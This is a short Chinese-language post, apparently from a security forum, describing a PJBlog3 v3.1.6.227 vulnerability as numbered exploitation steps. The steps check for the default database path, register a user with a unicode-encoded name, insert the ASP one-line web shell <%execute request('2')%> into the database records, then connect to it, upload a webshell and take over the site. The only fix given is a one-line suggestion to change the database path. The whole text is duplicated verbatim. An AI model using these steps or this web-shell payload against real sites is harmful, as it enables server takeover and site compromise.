PJBlog3 v3.1.6.227最新漏洞
1、查看默认数据库blogDB/PBLog3.asp是否存在!
2、注册个ID
3、以┼攠數畣整爠煥敵瑳∨≒┩眾┼砧 这个为名 密码随便下
4、在到用户管理位置找到 你注册的用户 在把这个 |||┠砾。“:%>x”unicode压缩后“┠砾” 都复制到所有记录里
最后在插入一句话<%execute request("2")%>确定提交
5、在用一句话连接 上传WEBSHELL 拿下此站点
解决方案:
修改数据库路径
1、查看默认数据库blogDB/PBLog3.asp是否存在!
2、注册个ID
3、以┼攠數畣整爠煥敵瑳∨≒┩眾┼砧 这个为名 密码随便下
4、在到用户管理位置找到 你注册的用户 在把这个 |||┠砾。“:%>x”unicode压缩后“┠砾” 都复制到所有记录里
最后在插入一句话<%execute request("2")%>确定提交
5、在用一句话连接 上传WEBSHELL 拿下此站点
解决方案:
修改数据库路径